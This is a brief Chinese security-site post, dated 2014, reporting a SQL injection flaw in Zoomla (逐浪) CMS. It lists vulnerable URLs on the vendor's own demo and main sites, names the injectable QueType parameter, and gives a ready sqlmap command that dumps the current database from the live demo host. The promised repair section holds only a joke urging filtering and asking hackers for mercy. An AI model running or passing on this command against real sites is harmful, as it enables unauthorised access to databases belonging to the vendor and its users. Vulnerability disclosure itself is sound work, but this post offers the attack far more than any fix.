逐浪cms通用型Sql注入漏洞及漏洞修复方案2014下载

来源:黑吧安全网 浏览:930次 时间:2014-05-07
做网站找雨过天晴工作室

逐浪cms通用型Sql注入漏洞及漏洞修复方案2014

Url:http://demo.zoomla.cn/Guest/Ask/MyAskList.aspx?QueType=

http://www.zoomla.cn/guest/Ask/MyAskList.aspx?QueType=

参数QueType

权限太大啊,妥妥低。

sqlmap.py -u "http://demo.zoomla.cn/Guest/Ask/MyAskList.aspx?

QueType=1" -v 1 --current-db

修复方案:

赶快过滤吧,黑客大牛们手下留情,哈哈